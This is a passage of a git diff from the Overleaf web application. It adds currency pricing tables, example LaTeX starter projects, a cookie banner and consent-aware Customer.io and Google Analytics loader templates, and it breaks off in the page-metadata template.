"additional_license_legacy_price_in_cents": 15500 + }, + "20": { + "price_in_cents": 430000, + "additional_license_legacy_price_in_cents": 14300 + }, + "50": { + "price_in_cents": 1075000, + "additional_license_legacy_price_in_cents": 13100 + } + }, + "BRL": { + "2": { + "price_in_cents": 89800, + "additional_license_legacy_price_in_cents": 34900 + }, + "3": { + "price_in_cents": 134700, + "additional_license_legacy_price_in_cents": 34900 + }, + "4": { + "price_in_cents": 179600, + "additional_license_legacy_price_in_cents": 34900 + }, + "5": { + "price_in_cents": 224500, + "additional_license_legacy_price_in_cents": 34900 + }, + "10": { + "price_in_cents": 449000, + "additional_license_legacy_price_in_cents": 32400 + }, + "20": { + "price_in_cents": 898000, + "additional_license_legacy_price_in_cents": 29900 + }, + "50": { + "price_in_cents": 2245000, + "additional_license_legacy_price_in_cents": 27400 + } + }, + "CAD": { + "2": { + "price_in_cents": 41200, + "additional_license_legacy_price_in_cents": 16000 + }, + "3": { + "price_in_cents": 61800, + "additional_license_legacy_price_in_cents": 16000 + }, + "4": { + "price_in_cents": 82400, + "additional_license_legacy_price_in_cents": 16000 + }, + "5": { + "price_in_cents": 103000, + "additional_license_legacy_price_in_cents": 16000 + }, + "10": { + "price_in_cents": 206000, + "additional_license_legacy_price_in_cents": 14800 + }, + "20": { + "price_in_cents": 412000, + "additional_license_legacy_price_in_cents": 13700 + }, + "50": { + "price_in_cents": 1030000, + "additional_license_legacy_price_in_cents": 12500 + } + }, + "CHF": { + "2": { + "price_in_cents": 35800, + "additional_license_legacy_price_in_cents": 13900 + }, + "3": { + "price_in_cents": 53700, + "additional_license_legacy_price_in_cents": 13900 + }, + "4": { + "price_in_cents": 71600, + "additional_license_legacy_price_in_cents": 13900 + }, + "5": { + "price_in_cents": 89500, + "additional_license_legacy_price_in_cents": 13900 + }, + "10": { + "price_in_cents": 179000, + "additional_license_legacy_price_in_cents": 12900 + }, + "20": { + "price_in_cents": 358000, + "additional_license_legacy_price_in_cents": 11900 + }, + "50": { + "price_in_cents": 895000, + "additional_license_legacy_price_in_cents": 10900 + } + }, + "CLP": { + "2": { + "price_in_cents": 19978200, + "additional_license_legacy_price_in_cents": 7769300 + }, + "3": { + "price_in_cents": 29967300, + "additional_license_legacy_price_in_cents": 7769300 + }, + "4": { + "price_in_cents": 39956400, + "additional_license_legacy_price_in_cents": 7769300 + }, + "5": { + "price_in_cents": 49945500, + "additional_license_legacy_price_in_cents": 7769300 + }, + "10": { + "price_in_cents": 99891000, + "additional_license_legacy_price_in_cents": 7214300 + }, + "20": { + "price_in_cents": 199782000, + "additional_license_legacy_price_in_cents": 6659400 + }, + "50": { + "price_in_cents": 499455000, + "additional_license_legacy_price_in_cents": 6104400 + } + }, + "COP": { + "2": { + "price_in_cents": 70182000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "3": { + "price_in_cents": 105273000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "4": { + "price_in_cents": 140364000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "5": { + "price_in_cents": 175455000, + "additional_license_legacy_price_in_cents": 27293000 + }, + "10": { + "price_in_cents": 350910000, + "additional_license_legacy_price_in_cents": 25343500 + }, + "20": { + "price_in_cents": 701820000, + 
"additional_license_legacy_price_in_cents": 23394000 + }, + "50": { + "price_in_cents": 1754550000, + "additional_license_legacy_price_in_cents": 21444500 + } + }, + "DKK": { + "2": { + "price_in_cents": 215800, + "additional_license_legacy_price_in_cents": 83900 + }, + "3": { + "price_in_cents": 323700, + "additional_license_legacy_price_in_cents": 83900 + }, + "4": { + "price_in_cents": 431600, + "additional_license_legacy_price_in_cents": 83900 + }, + "5": { + "price_in_cents": 539500, + "additional_license_legacy_price_in_cents": 83900 + }, + "10": { + "price_in_cents": 1079000, + "additional_license_legacy_price_in_cents": 77900 + }, + "20": { + "price_in_cents": 2158000, + "additional_license_legacy_price_in_cents": 71900 + }, + "50": { + "price_in_cents": 5395000, + "additional_license_legacy_price_in_cents": 65900 + } + }, + "EUR": { + "2": { + "price_in_cents": 32200, + "additional_license_legacy_price_in_cents": 12500 + }, + "3": { + "price_in_cents": 48300, + "additional_license_legacy_price_in_cents": 12500 + }, + "4": { + "price_in_cents": 64400, + "additional_license_legacy_price_in_cents": 12500 + }, + "5": { + "price_in_cents": 80500, + "additional_license_legacy_price_in_cents": 12500 + }, + "10": { + "price_in_cents": 161000, + "additional_license_legacy_price_in_cents": 11600 + }, + "20": { + "price_in_cents": 322000, + "additional_license_legacy_price_in_cents": 10700 + }, + "50": { + "price_in_cents": 805000, + "additional_license_legacy_price_in_cents": 9800 + } + }, + "GBP": { + "2": { + "price_in_cents": 28600, + "additional_license_legacy_price_in_cents": 11100 + }, + "3": { + "price_in_cents": 42900, + "additional_license_legacy_price_in_cents": 11100 + }, + "4": { + "price_in_cents": 57200, + "additional_license_legacy_price_in_cents": 11100 + }, + "5": { + "price_in_cents": 71500, + "additional_license_legacy_price_in_cents": 11100 + }, + "10": { + "price_in_cents": 143000, + "additional_license_legacy_price_in_cents": 10300 + }, + "20": { + "price_in_cents": 286000, + "additional_license_legacy_price_in_cents": 9500 + }, + "50": { + "price_in_cents": 715000, + "additional_license_legacy_price_in_cents": 8700 + } + }, + "INR": { + "2": { + "price_in_cents": 827800, + "additional_license_legacy_price_in_cents": 321900 + }, + "3": { + "price_in_cents": 1241700, + "additional_license_legacy_price_in_cents": 321900 + }, + "4": { + "price_in_cents": 1655600, + "additional_license_legacy_price_in_cents": 321900 + }, + "5": { + "price_in_cents": 2069500, + "additional_license_legacy_price_in_cents": 321900 + }, + "10": { + "price_in_cents": 4139000, + "additional_license_legacy_price_in_cents": 298900 + }, + "20": { + "price_in_cents": 8278000, + "additional_license_legacy_price_in_cents": 275900 + }, + "50": { + "price_in_cents": 20695000, + "additional_license_legacy_price_in_cents": 252900 + } + }, + "MXN": { + "2": { + "price_in_cents": 521800, + "additional_license_legacy_price_in_cents": 202900 + }, + "3": { + "price_in_cents": 782700, + "additional_license_legacy_price_in_cents": 202900 + }, + "4": { + "price_in_cents": 1043600, + "additional_license_legacy_price_in_cents": 202900 + }, + "5": { + "price_in_cents": 1304500, + "additional_license_legacy_price_in_cents": 202900 + }, + "10": { + "price_in_cents": 2609000, + "additional_license_legacy_price_in_cents": 188400 + }, + "20": { + "price_in_cents": 5218000, + "additional_license_legacy_price_in_cents": 173900 + }, + "50": { + "price_in_cents": 13045000, + "additional_license_legacy_price_in_cents": 159400 
+ } + }, + "NOK": { + "2": { + "price_in_cents": 260800, + "additional_license_legacy_price_in_cents": 101400 + }, + "3": { + "price_in_cents": 391200, + "additional_license_legacy_price_in_cents": 101400 + }, + "4": { + "price_in_cents": 521600, + "additional_license_legacy_price_in_cents": 101400 + }, + "5": { + "price_in_cents": 652000, + "additional_license_legacy_price_in_cents": 101400 + }, + "10": { + "price_in_cents": 1304000, + "additional_license_legacy_price_in_cents": 94100 + }, + "20": { + "price_in_cents": 2608000, + "additional_license_legacy_price_in_cents": 86900 + }, + "50": { + "price_in_cents": 6520000, + "additional_license_legacy_price_in_cents": 79600 + } + }, + "NZD": { + "2": { + "price_in_cents": 43000, + "additional_license_legacy_price_in_cents": 16700 + }, + "3": { + "price_in_cents": 64500, + "additional_license_legacy_price_in_cents": 16700 + }, + "4": { + "price_in_cents": 86000, + "additional_license_legacy_price_in_cents": 16700 + }, + "5": { + "price_in_cents": 107500, + "additional_license_legacy_price_in_cents": 16700 + }, + "10": { + "price_in_cents": 215000, + "additional_license_legacy_price_in_cents": 15500 + }, + "20": { + "price_in_cents": 430000, + "additional_license_legacy_price_in_cents": 14300 + }, + "50": { + "price_in_cents": 1075000, + "additional_license_legacy_price_in_cents": 13100 + } + }, + "PEN": { + "2": { + "price_in_cents": 82600, + "additional_license_legacy_price_in_cents": 32100 + }, + "3": { + "price_in_cents": 123900, + "additional_license_legacy_price_in_cents": 32100 + }, + "4": { + "price_in_cents": 165200, + "additional_license_legacy_price_in_cents": 32100 + }, + "5": { + "price_in_cents": 206500, + "additional_license_legacy_price_in_cents": 32100 + }, + "10": { + "price_in_cents": 413000, + "additional_license_legacy_price_in_cents": 29800 + }, + "20": { + "price_in_cents": 826000, + "additional_license_legacy_price_in_cents": 27500 + }, + "50": { + "price_in_cents": 2065000, + "additional_license_legacy_price_in_cents": 25200 + } + }, + "SEK": { + "2": { + "price_in_cents": 260800, + "additional_license_legacy_price_in_cents": 101400 + }, + "3": { + "price_in_cents": 391200, + "additional_license_legacy_price_in_cents": 101400 + }, + "4": { + "price_in_cents": 521600, + "additional_license_legacy_price_in_cents": 101400 + }, + "5": { + "price_in_cents": 652000, + "additional_license_legacy_price_in_cents": 101400 + }, + "10": { + "price_in_cents": 1304000, + "additional_license_legacy_price_in_cents": 94100 + }, + "20": { + "price_in_cents": 2608000, + "additional_license_legacy_price_in_cents": 86900 + }, + "50": { + "price_in_cents": 6520000, + "additional_license_legacy_price_in_cents": 79600 + } + }, + "SGD": { + "2": { + "price_in_cents": 46600, + "additional_license_legacy_price_in_cents": 18100 + }, + "3": { + "price_in_cents": 69900, + "additional_license_legacy_price_in_cents": 18100 + }, + "4": { + "price_in_cents": 93200, + "additional_license_legacy_price_in_cents": 18100 + }, + "5": { + "price_in_cents": 116500, + "additional_license_legacy_price_in_cents": 18100 + }, + "10": { + "price_in_cents": 233000, + "additional_license_legacy_price_in_cents": 16800 + }, + "20": { + "price_in_cents": 466000, + "additional_license_legacy_price_in_cents": 15500 + }, + "50": { + "price_in_cents": 1165000, + "additional_license_legacy_price_in_cents": 14200 + } + }, + "USD": { + "2": { + "price_in_cents": 35800, + "additional_license_legacy_price_in_cents": 13900 + }, + "3": { + "price_in_cents": 53700, + 
"additional_license_legacy_price_in_cents": 13900 + }, + "4": { + "price_in_cents": 71600, + "additional_license_legacy_price_in_cents": 13900 + }, + "5": { + "price_in_cents": 89500, + "additional_license_legacy_price_in_cents": 13900 + }, + "10": { + "price_in_cents": 179000, + "additional_license_legacy_price_in_cents": 12900 + }, + "20": { + "price_in_cents": 358000, + "additional_license_legacy_price_in_cents": 11900 + }, + "50": { + "price_in_cents": 895000, + "additional_license_legacy_price_in_cents": 10900 + } + } + } + } +} diff --git a/services/web/app/templates/project_files/example-project-sp/frog.jpg b/services/web/app/templates/project_files/example-project-sp/frog.jpg new file mode 100644 index 0000000..5b889ef Binary files /dev/null and b/services/web/app/templates/project_files/example-project-sp/frog.jpg differ diff --git a/services/web/app/templates/project_files/example-project-sp/main.tex b/services/web/app/templates/project_files/example-project-sp/main.tex new file mode 100644 index 0000000..fd3c032 --- /dev/null +++ b/services/web/app/templates/project_files/example-project-sp/main.tex @@ -0,0 +1,117 @@ +\documentclass{article} + +% Language setting +% Replace `english' with e.g. `spanish' to change the document language +\usepackage[english]{babel} + +% Set page size and margins +% Replace `letterpaper' with `a4paper' for UK/EU standard size +\usepackage[letterpaper,top=2cm,bottom=2cm,left=3cm,right=3cm,marginparwidth=1.75cm]{geometry} + +% Useful packages +\usepackage{amsmath} +\usepackage{graphicx} +\usepackage[colorlinks=true, allcolors=blue]{hyperref} + +\title{Your Paper} +\author{You} + +\begin{document} +\maketitle + +\begin{abstract} +Your abstract. +\end{abstract} + +\section{Introduction} + +Your introduction goes here! Simply start writing your document and use the Recompile button to view the updated PDF preview. Examples of commonly used commands and features are listed below, to help you get started. + +Once you're familiar with the editor, you can find various project settings in the Overleaf menu, accessed via the button in the very top left of the editor. + +\section{Some examples to get started} + +\subsection{How to create Sections and Subsections} + +Simply use the section and subsection commands, as in this example document! With Overleaf, all the formatting and numbering is handled automatically according to the template you've chosen. If you're using Rich Text mode, you can also create new section and subsections via the buttons in the editor toolbar. + +\subsection{How to include Figures} + +First you have to upload the image file from your computer using the upload link in the file-tree menu. Then use the includegraphics command to include it in your document. Use the figure environment and the caption command to add a number and a caption to your figure. See the code for Figure \ref{fig:frog} in this section for an example. + +Note that your figure will automatically be placed in the most appropriate place for it, given the surrounding text and taking into account other figures or tables that may be close by. + +\begin{figure} +\centering +\includegraphics[width=0.25\linewidth]{frog.jpg} +\caption{\label{fig:frog}This frog was uploaded via the file-tree menu.} +\end{figure} + +\subsection{How to add Tables} + +Use the table and tabular environments for basic tables --- see Table~\ref{tab:widgets}, for example. 
+
+\begin{table}
+\centering
+\begin{tabular}{l|r}
+Item & Quantity \\\hline
+Widgets & 42 \\
+Gadgets & 13
+\end{tabular}
+\caption{\label{tab:widgets}An example table.}
+\end{table}
+
+\subsection{How to add Comments and Track Changes}
+
+Comments can be added to your project by highlighting some text and clicking ``Add comment'' in the top right of the editor pane. To view existing comments, click on the Review menu in the toolbar above. To reply to a comment, click on the Reply button in the lower right corner of the comment. You can close the Review pane by clicking its name on the toolbar when you're done reviewing for the time being.
+
+Track changes are available on all our premium plans, and can be toggled on or off using the option at the top of the Review pane. Track changes allow you to keep track of every change made to the document, along with the person making the change.
+
+\subsection{How to add Lists}
+
+You can make lists with automatic numbering \dots
+
+\begin{enumerate}
+\item Like this,
+\item and like this.
+\end{enumerate}
+\dots or bullet points \dots
+\begin{itemize}
+\item Like this,
+\item and like this.
+\end{itemize}
+
+\subsection{How to write Mathematics}
+
+\LaTeX{} is great at typesetting mathematics. Let $X_1, X_2, \ldots, X_n$ be a sequence of independent and identically distributed random variables with $\text{E}[X_i] = \mu$ and $\text{Var}[X_i] = \sigma^2 < \infty$, and let
+\[S_n = \frac{X_1 + X_2 + \cdots + X_n}{n}
+ = \frac{1}{n}\sum_{i=1}^{n} X_i\]
+denote their mean. Then as $n$ approaches infinity, the random variables $\sqrt{n}(S_n - \mu)$ converge in distribution to a normal $\mathcal{N}(0, \sigma^2)$.
+
+
+\subsection{How to change the margins and paper size}
+
+Usually the template you're using will have the page margins and paper size set correctly for that use-case. For example, if you're using a journal article template provided by the journal publisher, that template will be formatted according to their requirements. In these cases, it's best not to alter the margins directly.
+
+If however you're using a more general template, such as this one, and would like to alter the margins, a common way to do so is via the geometry package. You can find the geometry package loaded in the preamble at the top of this example file; a short commented sketch of adjusting its settings appears just before the bibliography below.
+
+\subsection{How to change the document language and spell check settings}
+
+Overleaf supports many different languages, including multiple different languages within one document.
+
+To configure the document language, simply edit the option provided to the babel package in the preamble at the top of this example project.
+
+To change the spell check language, simply open the Overleaf menu at the top left of the editor window, scroll down to the spell check setting, and adjust accordingly.
+
+\subsection{How to add Citations and a References List}
+
+You can simply upload a \verb|.bib| file containing your BibTeX entries, created with a tool such as JabRef. You can then cite entries from it, like this: \cite{greenwade93}. Just remember to specify a bibliography style, as well as the filename of the \verb|.bib|.
+
+\subsection{Good luck!}
+
+We hope you find Overleaf useful!
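+
+% A minimal sketch of adjusting the margins via the geometry package
+% (already loaded in this file's preamble). A \geometry call such as the
+% one below belongs in the preamble; the lengths shown are illustrative
+% choices only, not values this template actually sets:
+%
+%   \geometry{a4paper, margin=2.5cm}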
+ +\bibliographystyle{alpha} +\bibliography{sample} + +\end{document} diff --git a/services/web/app/templates/project_files/example-project-sp/sample.bib b/services/web/app/templates/project_files/example-project-sp/sample.bib new file mode 100644 index 0000000..a0e21c7 --- /dev/null +++ b/services/web/app/templates/project_files/example-project-sp/sample.bib @@ -0,0 +1,9 @@ +@article{greenwade93, + author = "George D. Greenwade", + title = "The {C}omprehensive {T}ex {A}rchive {N}etwork ({CTAN})", + year = "1993", + journal = "TUGBoat", + volume = "14", + number = "3", + pages = "342--351" +} diff --git a/services/web/app/templates/project_files/example-project/frog.jpg b/services/web/app/templates/project_files/example-project/frog.jpg new file mode 100644 index 0000000..5b889ef Binary files /dev/null and b/services/web/app/templates/project_files/example-project/frog.jpg differ diff --git a/services/web/app/templates/project_files/example-project/main.tex b/services/web/app/templates/project_files/example-project/main.tex new file mode 100644 index 0000000..5199b66 --- /dev/null +++ b/services/web/app/templates/project_files/example-project/main.tex @@ -0,0 +1,119 @@ +\documentclass{article} + +% Language setting +% Replace `english' with e.g. `spanish' to change the document language +\usepackage[english]{babel} + +% Set page size and margins +% Replace `letterpaper' with `a4paper' for UK/EU standard size +\usepackage[letterpaper,top=2cm,bottom=2cm,left=3cm,right=3cm,marginparwidth=1.75cm]{geometry} + +% Useful packages +\usepackage{amsmath} +\usepackage{graphicx} +\usepackage[colorlinks=true, allcolors=blue]{hyperref} + +\title{Your Paper} +\author{You} + +\begin{document} +\maketitle + +\begin{abstract} +Your abstract. +\end{abstract} + +\section{Introduction} + +Your introduction goes here! Simply start writing your document and use the Recompile button to view the updated PDF preview. Examples of commonly used commands and features are listed below, to help you get started. + +Once you're familiar with the editor, you can find various project settings in the Overleaf menu, accessed via the button in the very top left of the editor. To view tutorials, user guides, and further documentation, please visit our \href{https://www.overleaf.com/learn}{help library}, or head to our plans page to \href{https://www.overleaf.com/user/subscription/plans}{choose your plan}. + +\section{Some examples to get started} + +\subsection{How to create Sections and Subsections} + +Simply use the section and subsection commands, as in this example document! With Overleaf, all the formatting and numbering is handled automatically according to the template you've chosen. If you're using the Visual Editor, you can also create new section and subsections via the buttons in the editor toolbar. + +\subsection{How to include Figures} + +First you have to upload the image file from your computer using the upload link in the file-tree menu. Then use the includegraphics command to include it in your document. Use the figure environment and the caption command to add a number and a caption to your figure. See the code for Figure \ref{fig:frog} in this section for an example. + +Note that your figure will automatically be placed in the most appropriate place for it, given the surrounding text and taking into account other figures or tables that may be close by. 
You can find out more about adding images to your documents in this help article on \href{https://www.overleaf.com/learn/how-to/Including_images_on_Overleaf}{including images on Overleaf}.
+
+\begin{figure}
+\centering
+\includegraphics[width=0.25\linewidth]{frog.jpg}
+\caption{\label{fig:frog}This frog was uploaded via the file-tree menu.}
+\end{figure}
+
+\subsection{How to add Tables}
+
+Use the table and tabular environments for basic tables --- see Table~\ref{tab:widgets}, for example. For more information, please see this help article on \href{https://www.overleaf.com/learn/latex/tables}{tables}.
+
+\begin{table}
+\centering
+\begin{tabular}{l|r}
+Item & Quantity \\\hline
+Widgets & 42 \\
+Gadgets & 13
+\end{tabular}
+\caption{\label{tab:widgets}An example table.}
+\end{table}
+
+\subsection{How to add Comments and Track Changes}
+
+Comments can be added to your project by highlighting some text and clicking ``Add comment'' in the top right of the editor pane. To view existing comments, click on the Review menu in the toolbar above. To reply to a comment, click on the Reply button in the lower right corner of the comment. You can close the Review pane by clicking its name on the toolbar when you're done reviewing for the time being.
+
+Track changes are available on all our \href{https://www.overleaf.com/user/subscription/plans}{premium plans}, and can be toggled on or off using the option at the top of the Review pane. Track changes allow you to keep track of every change made to the document, along with the person making the change.
+
+\subsection{How to add Lists}
+
+You can make lists with automatic numbering \dots
+
+\begin{enumerate}
+\item Like this,
+\item and like this.
+\end{enumerate}
+\dots or bullet points \dots
+\begin{itemize}
+\item Like this,
+\item and like this.
+\end{itemize}
+
+\subsection{How to write Mathematics}
+
+\LaTeX{} is great at typesetting mathematics. Let $X_1, X_2, \ldots, X_n$ be a sequence of independent and identically distributed random variables with $\text{E}[X_i] = \mu$ and $\text{Var}[X_i] = \sigma^2 < \infty$, and let
+\[S_n = \frac{X_1 + X_2 + \cdots + X_n}{n}
+ = \frac{1}{n}\sum_{i=1}^{n} X_i\]
+denote their mean. Then as $n$ approaches infinity, the random variables $\sqrt{n}(S_n - \mu)$ converge in distribution to a normal $\mathcal{N}(0, \sigma^2)$.
+
+
+\subsection{How to change the margins and paper size}
+
+Usually the template you're using will have the page margins and paper size set correctly for that use-case. For example, if you're using a journal article template provided by the journal publisher, that template will be formatted according to their requirements. In these cases, it's best not to alter the margins directly.
+
+If however you're using a more general template, such as this one, and would like to alter the margins, a common way to do so is via the geometry package. You can find the geometry package loaded in the preamble at the top of this example file, and if you'd like to learn more about how to adjust the settings, please visit this help article on \href{https://www.overleaf.com/learn/latex/page_size_and_margins}{page size and margins}.
+
+\subsection{How to change the document language and spell check settings}
+
+Overleaf supports many different languages, including multiple different languages within one document.
+
+To configure the document language, simply edit the option provided to the babel package in the preamble at the top of this example project.
To learn more about the different options, please visit this help article on \href{https://www.overleaf.com/learn/latex/International_language_support}{international language support}. + +To change the spell check language, simply open the Overleaf menu at the top left of the editor window, scroll down to the spell check setting, and adjust accordingly. + +\subsection{How to add Citations and a References List} + +You can simply upload a \verb|.bib| file containing your BibTeX entries, created with a tool such as JabRef. You can then cite entries from it, like this: \cite{greenwade93}. Just remember to specify a bibliography style, as well as the filename of the \verb|.bib|. You can find a \href{https://www.overleaf.com/help/97-how-to-include-a-bibliography-using-bibtex}{video tutorial here} to learn more about BibTeX. + +If you have an \href{https://www.overleaf.com/user/subscription/plans}{upgraded account}, you can also import your Mendeley or Zotero library directly as a \verb|.bib| file, via the upload menu in the file-tree. + +\subsection{Good luck!} + +We hope you find Overleaf useful, and do take a look at our \href{https://www.overleaf.com/learn}{help library} for more tutorials and user guides! Please also let us know if you have any feedback using the Contact Us link at the bottom of the Overleaf menu --- or use the contact form at \url{https://www.overleaf.com/contact}. + +\bibliographystyle{alpha} +\bibliography{sample} + +\end{document} \ No newline at end of file diff --git a/services/web/app/templates/project_files/example-project/sample.bib b/services/web/app/templates/project_files/example-project/sample.bib new file mode 100644 index 0000000..a0e21c7 --- /dev/null +++ b/services/web/app/templates/project_files/example-project/sample.bib @@ -0,0 +1,9 @@ +@article{greenwade93, + author = "George D. Greenwade", + title = "The {C}omprehensive {T}ex {A}rchive {N}etwork ({CTAN})", + year = "1993", + journal = "TUGBoat", + volume = "14", + number = "3", + pages = "342--351" +} diff --git a/services/web/app/templates/project_files/main.tex b/services/web/app/templates/project_files/main.tex new file mode 100644 index 0000000..0d6646a --- /dev/null +++ b/services/web/app/templates/project_files/main.tex @@ -0,0 +1,30 @@ +\documentclass{article} + +\title{<%= project_name %>} +\author{<%= user.first_name %> <%= user.last_name %>} +\date{<%= month %> <%= year %>} + +\usepackage{natbib} +\usepackage{graphicx} + +\begin{document} + +\maketitle + +\section{Introduction} +There is a theory which states that if ever anyone discovers exactly what the Universe is for and why it is here, it will instantly disappear and be replaced by something even more bizarre and inexplicable. +There is another theory which states that this has already happened. + +\begin{figure}[h!] 
+\centering +\includegraphics[scale=1.7]{universe} +\caption{The Universe} +\label{fig:universe} +\end{figure} + +\section{Conclusion} +``I always thought something was fundamentally wrong with the universe'' \citep{adams1995hitchhiker} + +\bibliographystyle{plain} +\bibliography{references} +\end{document} diff --git a/services/web/app/templates/project_files/mainbasic.tex b/services/web/app/templates/project_files/mainbasic.tex new file mode 100644 index 0000000..aa025f2 --- /dev/null +++ b/services/web/app/templates/project_files/mainbasic.tex @@ -0,0 +1,14 @@ +\documentclass{article} +\usepackage{graphicx} % Required for inserting images + +\title{<%= project_name %>} +\author{<%= user.first_name %> <%= user.last_name %>} +\date{<%= month %> <%= year %>} + +\begin{document} + +\maketitle + +\section{Introduction} + +\end{document} diff --git a/services/web/app/templates/project_files/references.bib b/services/web/app/templates/project_files/references.bib new file mode 100644 index 0000000..1758b10 --- /dev/null +++ b/services/web/app/templates/project_files/references.bib @@ -0,0 +1,8 @@ +@book{adams1995hitchhiker, + title={The Hitchhiker's Guide to the Galaxy}, + author={Adams, D.}, + isbn={9781417642595}, + url={http://books.google.com/books?id=W-xMPgAACAAJ}, + year={1995}, + publisher={San Val} +} diff --git a/services/web/app/templates/project_files/universe.jpg b/services/web/app/templates/project_files/universe.jpg new file mode 100644 index 0000000..ed19e7d Binary files /dev/null and b/services/web/app/templates/project_files/universe.jpg differ diff --git a/services/web/app/views/_cookie_banner.pug b/services/web/app/views/_cookie_banner.pug new file mode 100644 index 0000000..a164e48 --- /dev/null +++ b/services/web/app/views/_cookie_banner.pug @@ -0,0 +1,5 @@ +.cookie-banner.hidden-print.hidden + .cookie-banner-content We only use cookies for essential purposes and to improve your experience on our site. You can find out more in our <a href="/legal#Cookies">cookie policy</a>. + .cookie-banner-actions + button(type="button" class="btn btn-link btn-sm" data-ol-cookie-banner-set-consent="essential") Essential cookies only + button(type="button" class="btn btn-primary btn-sm" data-ol-cookie-banner-set-consent="all") Accept all cookies \ No newline at end of file diff --git a/services/web/app/views/_customer_io.pug b/services/web/app/views/_customer_io.pug new file mode 100644 index 0000000..81d75f7 --- /dev/null +++ b/services/web/app/views/_customer_io.pug @@ -0,0 +1,26 @@ +if(customerIoEnabled && ExposedSettings.cioWriteKey && ExposedSettings.cioSiteId) + script(type="text/javascript", id="cio-loader", nonce=scriptNonce, data-cio-write-key=ExposedSettings.cioWriteKey, data-cio-site-id=ExposedSettings.cioSiteId, data-session-analytics-id=getSessionAnalyticsId(), data-user-id=getLoggedInUserId()). 
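+ // Configuration arrives via the data-* attributes set on this script
+ // tag above; reading them back out of `dataset` (below) avoids
+ // interpolating values directly into the inline snippet.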
+ var cioSettings = document.querySelector('#cio-loader').dataset; + var analyticsId = cioSettings.sessionAnalyticsId; + var siteId = cioSettings.cioSiteId; + var writeKey = cioSettings.cioWriteKey; + var userId = cioSettings.userId; + + !function(){var i="cioanalytics", analytics=(window[i]=window[i]||[]);if(!analytics.initialize)if(analytics.invoked)window.console&&console.error&&console.error("Snippet included twice.");else{analytics.invoked=!0;analytics.methods=["trackSubmit","trackClick","trackLink","trackForm","pageview","identify","reset","group","track","ready","alias","debug","page","once","off","on","addSourceMiddleware","addIntegrationMiddleware","setAnonymousId","addDestinationMiddleware"];analytics.factory=function(e){return function(){var t=Array.prototype.slice.call(arguments);t.unshift(e);analytics.push(t);return analytics}};for(var e=0;e<analytics.methods.length;e++){var key=analytics.methods[e];analytics[key]=analytics.factory(key)}analytics.load=function(key,e){var t=document.createElement("script");t.type="text/javascript";t.async=!0;t.setAttribute('data-global-customerio-analytics-key', i);t.src="https://cdp.customer.io/v1/analytics-js/snippet/" + key + "/analytics.min.js";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(t,n);analytics._writeKey=key;analytics._loadOptions=e};analytics.SNIPPET_VERSION="4.15.3"; + analytics.load( + writeKey, + { + disableClientPersistence: true, + "integrations": { + "Customer.io In-App Plugin": { + siteId + } + } + } + ); + if (analyticsId) { + analytics.setAnonymousId(analyticsId); + }; + // If userId is undefined, identify sends only the anonymousId (aka analyticsId) + analytics.identify(userId); + }}(); diff --git a/services/web/app/views/_google_analytics.pug b/services/web/app/views/_google_analytics.pug new file mode 100644 index 0000000..56cc291 --- /dev/null +++ b/services/web/app/views/_google_analytics.pug @@ -0,0 +1,58 @@ +if (typeof(ExposedSettings.gaTokenV4) != "undefined" || typeof(ExposedSettings.gaToken) != "undefined") + script(type="text/javascript", nonce=scriptNonce, id="ga-loader" data-ga-token=ExposedSettings.gaToken data-ga-token-v4=ExposedSettings.gaTokenV4 data-cookie-domain=ExposedSettings.cookieDomain data-session-analytics-id=getSessionAnalyticsId()). + var gaSettings = document.querySelector('#ga-loader').dataset; + var gaid = gaSettings.gaTokenV4; + var gaToken = gaSettings.gaToken; + var cookieDomain = gaSettings.cookieDomain; + var sessionAnalyticsId = gaSettings.sessionAnalyticsId; + if(gaid) { + var additionalGaConfig = sessionAnalyticsId ? 
{ 'user_id': sessionAnalyticsId } : {}; + window.dataLayer = window.dataLayer || []; + function gtag(){ + dataLayer.push(arguments); + } + gtag('js', new Date()); + gtag('config', gaid, { 'anonymize_ip': true, ...additionalGaConfig }); + } + if (gaToken) { + window.ga = window.ga || function () { + (window.ga.q = window.ga.q || []).push(arguments); + }, window.ga.l = 1 * new Date(); + } + var loadGA = window.olLoadGA = function() { + if (gaid) { + var s = document.createElement('script'); + s.setAttribute('async', 'async'); + s.setAttribute('src', 'https://www.googletagmanager.com/gtag/js?id=' + gaid); + document.querySelector('head').append(s); + } + if (gaToken) { + (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ + (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), + m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) + })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); + ga('create', gaToken, cookieDomain.replace(/^\./, "")); + ga('set', 'anonymizeIp', true); + if (sessionAnalyticsId) { + ga('set', 'userId', sessionAnalyticsId); + } + ga('send', 'pageview'); + } + }; + // Check if consent given (features/cookie-banner) + var oaCookie = document.cookie.split('; ').find(function(cookie) { + return cookie.startsWith('oa='); + }); + if(oaCookie) { + var oaCookieValue = oaCookie.split('=')[1]; + if(oaCookieValue === '1') { + loadGA(); + } + } + +if typeof(ExposedSettings.gaTokenV4) === "undefined" + script(type="text/javascript", nonce=scriptNonce). + window.gtag = function() { console.log("would send to GA4", arguments) }; +if typeof(ExposedSettings.gaToken) === "undefined" + script(type="text/javascript", nonce=scriptNonce). + window.ga = function() { console.log("would send to GA", arguments) }; diff --git a/services/web/app/views/_metadata.pug b/services/web/app/views/_metadata.pug new file mode 100644 index 0000000..a784860 --- /dev/null +++ b/services/web/app/views/_metadata.pug @@ -0,0 +1,123 @@ + +//- Title +if (metadata && metadata.title) + title= metadata.title + ' - ' + settings.appName + ', ' + translate("online_latex_editor") + meta(name="twitter:title", content=metadata.title) + meta(name="og:title", content=metadata.title) +else if (typeof(title) == "undefined") + title= settings.appName + ', '+ translate("online_latex_editor") + meta(name="twitter:title", content=settings.appName + ', '+ translate("online_latex_editor")) + meta(name="og:title", content=settings.appName + ', '+ translate("online_latex_editor")) +else + title= translate(title) + ' - ' + settings.appName + ', ' + translate("online_latex_editor") + //- to do - not translate? 
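The three title branches above all end in the same "<page title> - appName, Online LaTeX Editor" suffix and differ only in where the leading part comes from. A condensed sketch of that precedence, with metadata, title, settings, and translate standing in for the Pug locals of the same names (an editor's illustration, not code from this commit):

// Sketch of the page-title precedence in _metadata.pug above.
// `metadata`, `title`, `settings`, and `translate` mirror the Pug locals;
// illustration only, not part of the commit.
function pageTitle(metadata, title, settings, translate) {
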